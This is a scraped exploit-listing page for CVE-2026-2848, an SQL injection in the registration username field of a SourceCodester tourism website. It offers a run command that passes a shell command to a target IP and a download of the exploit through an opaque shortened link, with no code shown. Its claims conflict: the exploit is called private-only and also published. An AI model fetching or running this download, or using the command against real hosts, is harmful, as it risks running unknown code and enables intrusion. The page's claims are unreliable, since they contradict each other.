## https://sploitus.com/exploit?id=E8177150-DDB0-564F-A2E9-1FDC22A1EB87
# file /classes/Master.php?f=register of the SQL Injection (CVE-2026-2848)
## Overview
A HIGH vulnerability, classified as CVE-2026-2848, has been identified, categorized under CWE-74, CWE-89, CWE-89, (CVSS 7.3). A flaw has been found in SourceCodester Simple Responsive Tourism Website 1.0. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php?f=register of the component Registration.
## Details
- **CVE ID**: [CVE-2026-2848](https://nvd.nist.gov/vuln/detail/CVE-2026-2848)
- **Discovered**: 2026-02-20
- **Published**: 2026-02-20
- **Impact**: Confidentiality, Integrity, Availability
- **Exploit Availability**: Not public, only private.
## Vulnerability Description
A flaw has been found in SourceCodester Simple Responsive Tourism Website 1.0. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php?f=register of the component Registration. This manipulation of the argument Username causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used.
## Affected Versions
**Oretnom23 Simple Responsive Tourism Website:**
- 1.0
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **security@exploit.in**
## Exploit:
### [Download here](https://tinyurl.com/293wseol)